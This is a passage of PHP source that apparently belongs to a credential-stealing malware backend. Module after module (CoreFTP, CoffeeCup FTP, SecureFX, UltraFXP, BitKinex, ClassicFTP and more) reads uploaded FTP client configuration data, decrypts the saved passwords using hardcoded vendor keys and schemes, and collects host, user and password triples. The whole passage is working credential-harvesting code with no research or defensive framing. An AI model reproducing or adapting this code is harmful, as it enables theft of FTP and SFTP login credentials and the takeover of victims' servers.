2931. for ($i = 0; $i < 5; $i++)
2932. {
2933. $key .= $digest1[$i*4+3];
2934. $key .= $digest1[$i*4+2];
2935. $key .= $digest1[$i*4+1];
2936. $key .= $digest1[$i*4+0];
2937. }
2938.  
2939. for ($i = 0; $i < 3; $i++)
2940. {
2941. $key .= $digest2[$i*4+3];
2942. $key .= $digest2[$i*4+2];
2943. $key .= $digest2[$i*4+1];
2944. $key .= $digest2[$i*4+0];
2945. }
2946.  
2947. $data_iv = explode(':', $pass);
2948.  
2949. if (count($data_iv) != 2)
2950. return '';
2951.  
2952. $data = hextostr($data_iv[1]);
2953. $iv = hextostr($data_iv[0]);
2954.  
2955. if (($data === false) || ($iv === false) || (strlen($data) % 16 != 0) || (strlen($iv) != 16))
2956. {
2957. $this->log->add('ERR_INVALID_HEX_STRING');
2958. return '';
2959. }
2960.  
2961. $data = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC, $iv);
2962.  
2963. if (!strlen($data))
2964. {
2965. $this->log->add("ERR_CANNOT_DECRYPT_PASSWORD");
2966. }
2967.  
2968. return ztrim($data);
2969. }
2970.  
2971. protected function decrypt_pass($pass, $cred_salt, $cred_check)
2972. {
2973. if (strlen($pass) == 0)
2974. return '';
2975.  
2976. switch (substr($pass, 0, 2))
2977. {
2978. case "0A":
2979. return $this->decrypt_old(substr($pass, 2));
2980. break;
2981. case "0B":
2982. $master_pass = $this->check_masterpass($cred_salt, $cred_check);
2983. if ($master_pass)
2984. return $this->decrypt_old(substr($pass, 2), $master_pass);
2985. break;
2986. case "0C":
2987. $master_pass = $this->check_masterpass($cred_salt, $cred_check);
2988. if ($master_pass)
2989. return $this->decrypt_new(substr($pass, 2), $master_pass);
2990. break;
2991. default:
2992. return $this->decrypt_old($pass);
2993. }
2994.  
2995. return '';
2996. }
2997.  
2998. private $cred_check = '';
2999. private $cred_salt = '';
3000.  
3001. public function import_item($stream, $id)
3002. {
3003. switch ($id)
3004. {
3005. case 0x0001:
3006. $this->cred_salt = $stream->read_str();
3007. break;
3008. case 0x0002:
3009. $this->cred_check = $stream->read_str();
3010. break;
3011. case 0x0000:
3012. $host = $stream->read_str();
3013. $user = $stream->read_str();
3014. $pass = $stream->read_str();
3015. $dir = $stream->read_str();
3016. $port = $stream->read_dword();
3017.  
3018. // decrypt password
3019. $pass = $this->decrypt_pass($pass, $this->cred_salt, $this->cred_check);
3020.  
3021. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
3022.  
3023. break;
3024. default:
3025. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3026. return false;
3027. }
3028. return true;
3029. }
3030. }
3031.  
3032. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3033. // CoffeeCup FTP
3034.  
3035. class module_coffeecupftp extends module
3036. {
3037. protected function decrypt_pass($pass)
3038. {
3039. if (strlen($pass) == 0)
3040. return '';
3041.  
3042. $crypt_key = 'robert249fsd)af8.?sf2eaya;sd$%85034gsn%@#!afsgsjdg;iawe;otigkbarr';
3043.  
3044. $salt = strlen($crypt_key)-1;
3045.  
3046. for ($i = 0; $i < strlen($pass); $i++)
3047. {
3048. if (($salt & 8) == 0)
3049. $salt ^= 1;
3050. $salt = (~$salt) & 0xff;
3051. $salt = (($salt >> 1) | ($salt << 7)) & 0xff;
3052. $pass[$i] = chr(ord($crypt_key[strlen($crypt_key)-$i%strlen($crypt_key)-1]) ^ $salt ^ ord($pass[$i]));
3053. }
3054.  
3055. return $pass;
3056. }
3057.  
3058. public function import_item($stream, $id)
3059. {
3060. switch ($id)
3061. {
3062. case 0x0000:
3063. $host = $stream->read_str();
3064. $user = $stream->read_str();
3065. $pass = $stream->read_str();
3066. $port = $stream->read_str();
3067. $dir = $stream->read_str();
3068.  
3069. // decrypt password
3070. $pass = $this->decrypt_pass($pass);
3071.  
3072. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
3073.  
3074. break;
3075. default:
3076. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3077. return false;
3078. }
3079. return true;
3080. }
3081. }
3082.  
3083. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3084. // CoreFTP
3085.  
3086. class module_coreftp extends module
3087. {
3088. protected function decrypt_pass($pass)
3089. {
3090. if (strlen($pass) == 0 || strlen($pass) % 32 != 0)
3091. return '';
3092.  
3093. $iv = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
3094. $key = 'hdfzpysvpzimorhk';
3095. $data = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, hextostr($pass), MCRYPT_MODE_ECB, $iv);
3096.  
3097. if (!strlen($data))
3098. {
3099. $this->log->add("ERR_CANNOT_DECRYPT_PASSWORD");
3100. }
3101.  
3102. return $data;
3103. }
3104.  
3105. public function import_item($stream, $id)
3106. {
3107. switch ($id)
3108. {
3109. case 0x0000:
3110. case 0x0010:
3111. $host = $stream->read_str();
3112. $user = $stream->read_str();
3113. $pass = $stream->read_str();
3114. $port = $stream->read_dword();
3115. $dir = $stream->read_str();
3116.  
3117. if (($id & 0x10) > 0)
3118. $ssh = $stream->read_dword();
3119. else
3120. $ssh = 0;
3121.  
3122. // decrypt password
3123. $pass = $this->decrypt_pass($pass);
3124.  
3125. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $ssh == 1), $port, $dir), $user, $pass);
3126.  
3127. break;
3128. default:
3129. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3130. return false;
3131. }
3132. return true;
3133. }
3134. }
3135.  
3136. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3137. // FTP Explorer
3138.  
3139. class stream_ftpexplorer extends stream
3140. {
3141. public function read_explorerstr()
3142. {
3143. if (!$this->state)
3144. return false;
3145. $w = $this->read_word();
3146. $b = $this->read_byte();
3147. if ($w != 0xfeff || $b != 0xff)
3148. {
3149. $this->push_error('ERR_FTPEXPLORER_STR');
3150. return false;
3151. }
3152. $len = $this->read_byte();
3153. if ($len == 0xff)
3154. $len = $this->read_word();
3155. if (!$this->state)
3156. return false;
3157. return unicode_to_ansi($this->read_strlen($len*2));
3158. }
3159.  
3160. public function read_explorerwstr()
3161. {
3162. if (!$this->state)
3163. return false;
3164. return $this->read_strlen($this->read_word());
3165. }
3166. }
3167.  
3168. class module_ftpexplorer extends module
3169. {
3170. private function read_xml_item($xml_array)
3171. {
3172. $host = assign($xml_array['Host']);
3173. $user = assign($xml_array['Login']);
3174. $pass = assign($xml_array['Password']);
3175. $port = assign($xml_array['Port']);
3176. $dir = assign($xml_array['RemotePath']);
3177.  
3178. $host = Utf8ToWin($host);
3179. $user = Utf8ToWin($user);
3180. $pass = Utf8ToWin($pass);
3181. $dir = Utf8ToWin($dir);
3182.  
3183. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
3184.  
3185. foreach ($xml_array as $value)
3186. {
3187. if (is_array($value))
3188. $this->read_xml_item($value);
3189. }
3190. }
3191.  
3192. private function rec_scan_xml_array($xml_array)
3193. {
3194. foreach ($xml_array as $key=>$value)
3195. {
3196. if (is_array($value))
3197. {
3198. if (strpos(strval($key), 'ftpx') !== false)
3199. $this->read_xml_item($value);
3200. $this->rec_scan_xml_array($value);
3201. }
3202. }
3203. }
3204.  
3205. private function process_xml($value)
3206. {
3207. if (!strlen($value))
3208. return;
3209. $xml_parser = new XMLParser($value);
3210. $parsed_xml = $xml_parser->parse();
3211. if (!$xml_parser->isError || is_array($parsed_xml))
3212. {
3213. $this->rec_scan_xml_array($parsed_xml);
3214. } else
3215. {
3216. $this->log->add("ERR_XML_PARSE");
3217. }
3218. }
3219.  
3220. private function process_reg($value)
3221. {
3222. if (strlen($value) <= 10)
3223. return;
3224.  
3225. $stream = new stream_ftpexplorer($value, $this->log);
3226. $stream->read_skip(8);
3227. $count = $stream->read_word();
3228.  
3229. for ($i = 0; $i < $count; $i++)
3230. {
3231. if (!$stream->state)
3232. break;
3233.  
3234. $item_type = $stream->read_word();
3235.  
3236. if ($item_type == 0xffff)
3237. {
3238. $stream->read_skip(2);
3239. $str_type = $stream->read_explorerwstr();
3240. if ($str_type == 'CMFCToolBarButton')
3241. $item_type = 0x8001;
3242. else if ($str_type == 'CFTPToolBarComboBoxButton')
3243. $item_type = 0x6001; // guess
3244. else
3245. $item_type = 0;
3246. }
3247.  
3248. if (!$stream->state)
3249. break;
3250.  
3251. switch ($item_type)
3252. {
3253. case 0x8001:
3254. $stream->read_skip(12);
3255. $stream->read_explorerstr(); // Label
3256. $stream->read_skip(20);
3257. break;
3258. case 0x6001:
3259. $stream->read_skip(12);
3260. $stream->read_explorerstr(); // Label
3261. $stream->read_skip(32);
3262. $this->add_ftp($stream->read_explorerstr()); // Current host
3263. $stream->read_skip(8);
3264. $host_count = $stream->read_word();
3265. if ($host_count)
3266. {
3267. for ($j = 0; $j < $host_count; $j++)
3268. {
3269. $this->add_ftp($stream->read_explorerstr()); // Additional host
3270. }
3271. $stream->read_skip(4*$host_count);
3272. }
3273. break;
3274. default:
3275. $this->log->add('ERR_INVALID_FTPEXLORER_ITEMTYPE');
3276. return;
3277. }
3278. }
3279. }
3280.  
3281. public function import_item($stream, $id)
3282. {
3283. switch ($id)
3284. {
3285. case 0x0000:
3286. $this->process_xml($stream->read_str());
3287. break;
3288. case 0x0001:
3289. $this->process_reg($stream->read_str());
3290. break;
3291. case 0x0002:
3292. $host = $stream->read_str();
3293. $user = $stream->read_str();
3294. $pass = $stream->read_str();
3295. $port = $stream->read_dword();
3296. $dir = $stream->read_str();;
3297. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
3298. break;
3299. default:
3300. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3301. return false;
3302. }
3303. return true;
3304. }
3305. }
3306.  
3307. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3308. // Frigate3 FTP
3309.  
3310. class module_frigateftp extends module
3311. {
3312. private function read_xml_item($xml_array, $quick = false, $parent = null)
3313. {
3314. $host = utf8_decode(assign($xml_array['Host']));
3315. $user = utf8_decode(assign($xml_array['User']));
3316. $pass = base64_decode(assign($xml_array['Pass']), true);
3317. $port = utf8_decode(assign($xml_array['Port']));
3318. $protocol = assign($xml_array['SecureType']);
3319.  
3320. if (strlen($pass) && strlen($user) && $quick && $parent !== null)
3321. {
3322. $this->add_ftp(append_port_dir(ftp_force_ssh($parent, $protocol == '2'), $port, $dir), $user, $pass);
3323. } else
3324. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '2'), $port, $dir), $user, $pass);
3325.  
3326. foreach ($xml_array as $key=>$value)
3327. {
3328. if (is_array($value))
3329. {
3330. if ($parent === null)
3331. $this->read_xml_item($value, $quick, $key);
3332. else
3333. $this->read_xml_item($value, $quick, $parent);
3334. }
3335. }
3336. }
3337.  
3338. private function rec_scan_xml_array($xml_array)
3339. {
3340. foreach ($xml_array as $key=>$value)
3341. {
3342. if (is_array($value))
3343. {
3344. if (strval($key) == 'Item')
3345. $this->read_xml_item($value);
3346. if (strval($key) == 'QuickFtp')
3347. {
3348. $this->read_xml_item($value, true);
3349. }
3350. $this->rec_scan_xml_array($value);
3351. }
3352. }
3353. }
3354.  
3355. protected function update_dumbroot_xml_file($xml_data)
3356. {
3357. if (($pos = strpos($xml_data, '<?xml')) !== false)
3358. {
3359. $pos = strpos($xml_data, '>', $pos);
3360. if ($pos !== false)
3361. {
3362. return str_insert("<Root>", $xml_data, $pos+1)."</Root>";
3363. }
3364. }
3365. return $xml_data;
3366. }
3367.  
3368. // workaround for idiotic xml generation
3369. protected function strip_bad_xml_tags($xml_data)
3370. {
3371. // strip erroneus XML tags
3372. while (($i = strpos($xml_data, '<QuickFtp>')) !== false)
3373. {
3374. $j = strpos($xml_data, '</QuickFtp>', $i+1);
3375. if ($j === false)
3376. break;
3377. $xml_data = substr($xml_data, 0, $i).substr($xml_data, $j+strlen('</QuickFtp>'));
3378. }
3379.  
3380. return $xml_data;
3381. }
3382.  
3383. private function process_xml($value)
3384. {
3385. if (!strlen($value))
3386. return;
3387.  
3388. $value = $this->strip_bad_xml_tags(trim($value));
3389. $value = $this->update_dumbroot_xml_file($value);
3390.  
3391. $xml_parser = new XMLParser(utf8_encode($value));
3392. $parsed_xml = $xml_parser->parse();
3393. if (!$xml_parser->isError || is_array($parsed_xml))
3394. {
3395. $this->rec_scan_xml_array($parsed_xml);
3396. } else
3397. {
3398. $this->log->add("ERR_XML_PARSE");
3399. }
3400. }
3401.  
3402. public function import_item($stream, $id)
3403. {
3404. switch ($id)
3405. {
3406. case 0x0000:
3407. $this->process_xml($stream->read_str());
3408. break;
3409. default:
3410. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3411. return false;
3412. }
3413. return true;
3414. }
3415. }
3416.  
3417. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3418. // SecureFX FTP 6.6
3419.  
3420. class module_securefx extends module
3421. {
3422. private function decrypt_pass($encrypted_password)
3423. {
3424. $encrypted_password = trim($encrypted_password);
3425. if (!strlen($encrypted_password))
3426. return '';
3427.  
3428. $is_unicode = 0;
3429. if ($encrypted_password[0] == 'u')
3430. {
3431. $is_unicode = 1;
3432. $encrypted_password = substr($encrypted_password, 1);
3433. }
3434.  
3435. $encrypted_password = trim($encrypted_password);
3436. if (!strlen($encrypted_password))
3437. return '';
3438.  
3439. $encrypted_bin_data = hextostr($encrypted_password);
3440. if ($encrypted_bin_data === false)
3441. {
3442. $this->log->add("ERR_INVALID_HEX_DATA");
3443. return '';
3444. }
3445.  
3446. $key1 = chr(0x24).chr(0xA6).chr(0x3D).chr(0xDE).chr(0x5B).chr(0xD3).chr(0xB3).chr(0x82).chr(0x9C).chr(0x7E).chr(0x06).chr(0xF4).chr(0x08).chr(0x16).chr(0xAA).chr(0x07);
3447. $key2 = chr(0x5f).chr(0xB0).chr(0x45).chr(0xA2).chr(0x94).chr(0x17).chr(0xD9).chr(0x16).chr(0xC6).chr(0xC6).chr(0xA2).chr(0xFF).chr(0x06).chr(0x41).chr(0x82).chr(0xB7);
3448. $iv = "\0\0\0\0\0\0\0\0";
3449.  
3450. $decrypted_data = mcrypt_decrypt(MCRYPT_BLOWFISH, $key1, $encrypted_bin_data, MCRYPT_MODE_CBC, $iv);
3451.  
3452. if (!strlen($decrypted_data))
3453. {
3454. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
3455. }
3456.  
3457. if (strlen($decrypted_data) > 8)
3458. {
3459. // remove first and last 4 bytes
3460. $decrypted_data = substr($decrypted_data, 4, -4);
3461. $decrypted_data = mcrypt_decrypt(MCRYPT_BLOWFISH, $key2, $decrypted_data, MCRYPT_MODE_CBC, $iv);
3462.  
3463. if (strlen($decrypted_data))
3464. {
3465. if ($is_unicode)
3466. {
3467. $decrypted_data = unicode_to_ansi(ztrim_unicode($decrypted_data));
3468. } else
3469. $decrypted_data = ztrim($decrypted_data);
3470. return $decrypted_data;
3471. } else
3472. {
3473. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
3474. }
3475. }
3476.  
3477. return '';
3478. }
3479.  
3480. private function process_ini($value)
3481. {
3482. if (!strlen($value))
3483. return;
3484.  
3485. $host = '';
3486. $dir = '';
3487. $user = '';
3488. $pass = '';
3489. $port = '';
3490. $proto = '';
3491.  
3492. $lines = parse_lines(UnkTextToAnsi($value));
3493. foreach ($lines as $single_line)
3494. {
3495. $split_values = explode('=', $single_line);
3496. if (count($split_values) == 2)
3497. {
3498. switch ($split_values[0])
3499. {
3500. case 'S:"Hostname"': $host = $split_values[1]; break;
3501. case 'S:"Initial Directory"': $dir = $split_values[1]; break;
3502. case 'S:"Username"': $user = $split_values[1]; break;
3503. case 'S:"Password"': $pass = $split_values[1]; break;
3504. case 'D:"Transfer Port"': $port = $split_values[1]; break;
3505. case 'S:"Transfer Protocol Name"': $proto = $split_values[1]; break;
3506.  
3507. }
3508. }
3509. }
3510.  
3511. if (strlen($port))
3512. {
3513. $port = hexdec($port);
3514. }
3515.  
3516. $pass = $this->decrypt_pass($pass);
3517. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $proto == 'SFTP'), $port, $dir), $user, $pass);
3518. }
3519.  
3520. public function import_item($stream, $id)
3521. {
3522. switch ($id)
3523. {
3524. case 0x0000:
3525. $this->process_ini($stream->read_str());
3526. break;
3527. default:
3528. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3529. return false;
3530. }
3531. return true;
3532. }
3533. }
3534.  
3535. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3536. // UltraFXP 1.7
3537.  
3538. class module_ultrafxp_base extends module
3539. {
3540. private function decrypt_pass($encrypted_password)
3541. {
3542. if (!strlen($encrypted_password))
3543. return '';
3544.  
3545. $decoded_password = hextostr(trim($encrypted_password));
3546.  
3547. if ($decoded_password === false)
3548. {
3549. $this->log->add('ERR_INVALID_HEX_STRING');
3550. return '';
3551. }
3552.  
3553. $const_iv = chr(59).chr(197).chr(31).chr(90).chr(94).chr(150).chr(19).chr(69);
3554. $hex_key = "B4E8D16C26323D4AEA8026CDCEBFFE6A4AE27DEB77F0894CBC25FA03E01B6B1C"; // ripemd256 hash of str "th3m3ugaysshit9"
3555. $cipher_key = hextostr($hex_key);
3556.  
3557. $iv = $const_iv;
3558.  
3559. $descriptor = mcrypt_module_open(MCRYPT_BLOWFISH, '', 'ecb', '');
3560.  
3561. if (!$descriptor)
3562. {
3563. $this->log->add("ERR_CANNOT_INITIALIZE_MCRYPT_MODULE");
3564. return '';
3565. }
3566.  
3567. mcrypt_generic_init($descriptor, $cipher_key, $iv);
3568.  
3569. encrypt_cts($descriptor, $cipher_key, $iv);
3570.  
3571. $iv = $const_iv;
3572. $plain_text = decrypt_cts($descriptor, $decoded_password, $iv);
3573.  
3574. mcrypt_generic_deinit($descriptor);
3575. mcrypt_module_close($descriptor);
3576.  
3577. return $plain_text;
3578. }
3579.  
3580. protected function read_xml_item($xml_array)
3581. {
3582. $host = utf8_decode(assign($xml_array['HOST']));
3583. $user = utf8_decode(assign($xml_array['USER']));
3584. $pass = utf8_decode(assign($xml_array['PASS']));
3585. $pass = $this->decrypt_pass($pass);
3586. $port = utf8_decode(assign($xml_array['PORT']));
3587. $dir = utf8_decode(assign($xml_array['RPATH']));
3588.  
3589. $protocol = assign($xml_array['SSL']);
3590.  
3591. if (is_array($protocol))
3592. $protocol = assign($protocol['value']);
3593.  
3594. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '4'), $port, $dir), $user, $pass);
3595.  
3596. foreach ($xml_array as $value)
3597. {
3598. if (is_array($value))
3599. $this->read_xml_item($value);
3600. }
3601. }
3602.  
3603. protected function rec_scan_xml_array($xml_array)
3604. {
3605. foreach ($xml_array as $key=>$value)
3606. {
3607. if (is_array($value))
3608. {
3609. if (strval($key) == 'SITE')
3610. $this->read_xml_item($value);
3611. $this->rec_scan_xml_array($value);
3612. }
3613. }
3614. }
3615.  
3616. protected function process_xml($value)
3617. {
3618. if (!strlen($value))
3619. return;
3620.  
3621. $value = utf8_encode($value);
3622.  
3623. $xml_parser = new XMLParser($value);
3624. $parsed_xml = $xml_parser->parse();
3625. if (!$xml_parser->isError || is_array($parsed_xml))
3626. {
3627. $this->rec_scan_xml_array($parsed_xml);
3628. } else
3629. {
3630. $this->log->add("ERR_XML_PARSE");
3631. }
3632. }
3633.  
3634. public function import_item($stream, $id)
3635. {
3636. switch ($id)
3637. {
3638. case 0x0000:
3639. $this->process_xml($stream->read_str());
3640. break;
3641. default:
3642. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3643. return false;
3644. }
3645. return true;
3646. }
3647. }
3648.  
3649. class module_ultrafxp extends module_ultrafxp_base
3650. {
3651.  
3652. }
3653.  
3654. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3655. // FTPRush 2.1.4, 2.1.5 (FTP client based on UltraFXP)
3656.  
3657. class module_ftprush extends module_ultrafxp_base
3658. {
3659.  
3660. }
3661.  
3662. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3663. // WebSitePublisher 2.1.5
3664.  
3665. class module_websitepublisher extends module
3666. {
3667. private function decrypt_pass($encrypted_password)
3668. {
3669. if (!strlen($encrypted_password))
3670. return '';
3671.  
3672. if (strlen($encrypted_password) == 1 || $encrypted_password[0] != chr(0x30))
3673. return '';
3674.  
3675. $encrypted_password = substr($encrypted_password, 1);
3676.  
3677. for ($i = 0; $i < strlen($encrypted_password); $i++)
3678. {
3679. $encoded_char = ord($encrypted_password[$i]);
3680.  
3681. if (($encoded_char >= 0x41 && $encoded_char <= 0x5a) || ($encoded_char >= 0x61 && $encoded_char <= 0x7a))
3682. $encrypted_password[$i] = chr(0xbb-$encoded_char);
3683. if ($encoded_char >= 0x30 && $encoded_char <= 0x39)
3684. $encrypted_password[$i] = chr(0x69-$encoded_char);
3685. }
3686.  
3687. return $encrypted_password;
3688. }
3689.  
3690. public function import_item($stream, $id)
3691. {
3692. switch ($id)
3693. {
3694. case 0x0000:
3695. $host = $stream->read_str();
3696. $user = $stream->read_str();
3697. $pass = $stream->read_str();
3698. $port = $stream->read_dword();
3699. $dir = '';
3700.  
3701. // separate dir from host value
3702. $host = str_replace("\\", "/", $host);
3703. while (strpos($host, "//") !== false)
3704. $host = str_replace("//", "/", $host);
3705.  
3706. $pos = strpos($host, "/");
3707. if ($pos !== false)
3708. {
3709. $dir = substr($host, $pos);
3710. $host = substr($host, 0, $pos);
3711. }
3712.  
3713. // decrypt password
3714. $pass = $this->decrypt_pass($pass);
3715.  
3716. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
3717.  
3718. break;
3719. default:
3720. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3721. return false;
3722. }
3723. return true;
3724. }
3725. }
3726.  
3727. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3728. // BitKinex 3.2.3
3729.  
3730. class module_bitkinex extends module
3731. {
3732. private function decrypt_pass($encrypted_password)
3733. {
3734. if (!strlen($encrypted_password))
3735. return '';
3736.  
3737. $decoded_password = hextostr(trim($encrypted_password));
3738.  
3739. if (($decoded_password === false) || (strlen($decoded_password) % 8 != 0))
3740. {
3741. $this->log->add('ERR_INVALID_HEX_STRING');
3742. return '';
3743. }
3744.  
3745. $cipher_key = 'BD-07021973+19101972-DB';
3746. $iv = "\0\0\0\0\0\0\0\0";
3747.  
3748. $deciphered_data = mcrypt_decrypt(MCRYPT_BLOWFISH, $cipher_key, $decoded_password, MCRYPT_MODE_ECB, $iv);
3749.  
3750. if (!strlen($deciphered_data))
3751. {
3752. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
3753. }
3754.  
3755. $decrypted_password = unicode_to_ansi(ztrim_unicode($deciphered_data));
3756.  
3757. return $decrypted_password;
3758. }
3759.  
3760. protected function process_ds_file($file_data)
3761. {
3762. if (!strlen($file_data))
3763. return;
3764.  
3765. $values = parse_lines(Utf8ToWin($file_data));
3766.  
3767. $user = '';
3768. $host = '';
3769. $dir = '';
3770. $protocol = '';
3771.  
3772. foreach ($values as $line)
3773. {
3774. if (strpos($line, "### Node definition: ") !== false)
3775. {
3776. $user = '';
3777. $host = '';
3778. $dir = '';
3779. $protocol = '';
3780. }
3781.  
3782. if (strpos($line, 'TYPE = SFTP') !== false)
3783. $protocol = 'sftp';
3784.  
3785. if (strpos($line, "SET DEFAULT_PATH ") !== false)
3786. $dir = trim(substr($line, strlen("SET DEFAULT_PATH ")));
3787.  
3788. if (strpos($line, "SET DST_ADDR ") !== false)
3789. $host = trim(substr($line, strlen("SET DST_ADDR ")));
3790.  
3791. if (strpos($line, "SET USER ") !== false)
3792. $user = trim(substr($line, strlen("SET USER ")));
3793.  
3794. if (strpos($line, "SET PASS ") !== false)
3795. {
3796. $pass = $this->decrypt_pass(trim(substr($line, strlen("SET PASS "))));
3797.  
3798. $this->add_ftp(append_dir(ftp_force_ssh($host, $protocol == 'sftp'), $dir), $user, $pass);
3799.  
3800. $user = '';
3801. $host = '';
3802. $dir = '';
3803. $protocol = '';
3804. }
3805. }
3806. }
3807.  
3808. public function import_item($stream, $id)
3809. {
3810. switch ($id)
3811. {
3812. case 0x0000:
3813. $ds_file = $stream->read_str();
3814. $this->process_ds_file($ds_file);
3815. break;
3816. default:
3817. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3818. return false;
3819. }
3820. return true;
3821. }
3822. }
3823.  
3824. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3825. // ExpanDrive 1.8.4
3826.  
3827. class module_expandrive extends module
3828. {
3829. private $password_pairs = array();
3830.  
3831. public function import_item($stream, $id)
3832. {
3833. switch ($id)
3834. {
3835. case 0x1000:
3836. $encrypted_pass = $stream->read_str();
3837. $decrypted_pass = $stream->read_str();
3838. if (strlen($encrypted_pass) && strlen($decrypted_pass))
3839. {
3840. $this->password_pairs[$encrypted_pass] = $decrypted_pass;
3841. }
3842. break;
3843. case 0x1001:
3844. $json_config = $stream->read_str();
3845.  
3846. $json_params = json_fmt_nice($json_config);
3847. $json_result = json_decode($json_params, true);
3848. if ($json_result !== null && is_array($json_result) && isset($json_result['drives']))
3849. {
3850. $json_result = $json_result['drives'];
3851. if ($json_result !== null && is_array($json_result))
3852. {
3853. foreach ($json_result as $param_array)
3854. {
3855. if (is_array($param_array))
3856. {
3857. $host = assign($param_array['server']);
3858. $port = assign($param_array['port']);
3859. $dir = assign($param_array['report_path']);
3860. $user = assign($param_array['username']);
3861. $pass = assign($param_array['password']);
3862. $protocol = assign($param_array['type']);
3863.  
3864. $pass = Utf8ToWin(assign($this->password_pairs[$pass]));
3865. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 'sftp'), $port, $dir), $user, $pass);
3866. }
3867. }
3868. }
3869. }
3870.  
3871. break;
3872. case 0x0000:
3873. $host = $stream->read_str();
3874. $user = $stream->read_str();
3875. $pass = $stream->read_str();
3876. $port = $stream->read_dword();
3877.  
3878. $this->add_ftp(append_port($host, $port), $user, $pass);
3879.  
3880. break;
3881. default:
3882. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3883. return false;
3884. }
3885. return true;
3886. }
3887. }
3888.  
3889. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3890. // ClassicFTP 2.14
3891.  
3892. // base class for ClassicFTP and Fling, both use same decryption scheme
3893. class module_classicftp_base extends module
3894. {
3895. private function decrypt_pass($encrypted_password)
3896. {
3897. if (strlen($encrypted_password) == 0)
3898. return '';
3899.  
3900. // Make decryption key
3901. $md5_hash = md5('nchkqxllib', true);
3902. $decryption_key = substr($md5_hash, 0, 5)."\0\0\0\0\0\0\0\0\0\0\0";
3903.  
3904. $decrypted_password = Utf8ToWin(rc4Decrypt($decryption_key, $encrypted_password));
3905.  
3906. return $decrypted_password;
3907. }
3908.  
3909. public function import_item($stream, $id)
3910. {
3911. switch ($id)
3912. {
3913. case 0x0000:
3914. $host = $stream->read_str();
3915. $user = $stream->read_str();
3916. $pass1 = trim($stream->read_str());
3917. $pass2 = $stream->read_str();
3918. $dir = $stream->read_str();
3919.  
3920. if (strlen($pass1))
3921. $this->add_ftp(append_dir($host, $dir), $user, $pass1);
3922.  
3923. if (strlen($pass2))
3924. {
3925. $pass2 = $this->decrypt_pass($pass2);
3926. $this->add_ftp(append_dir($host, $dir), $user, $pass2);
3927. }
3928.  
3929. break;
3930. default:
3931. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
3932. return false;
3933. }
3934. return true;
3935. }
3936. }
3937.  
3938. class module_classicftp extends module_classicftp_base
3939. {
3940.  
3941. }
3942.  
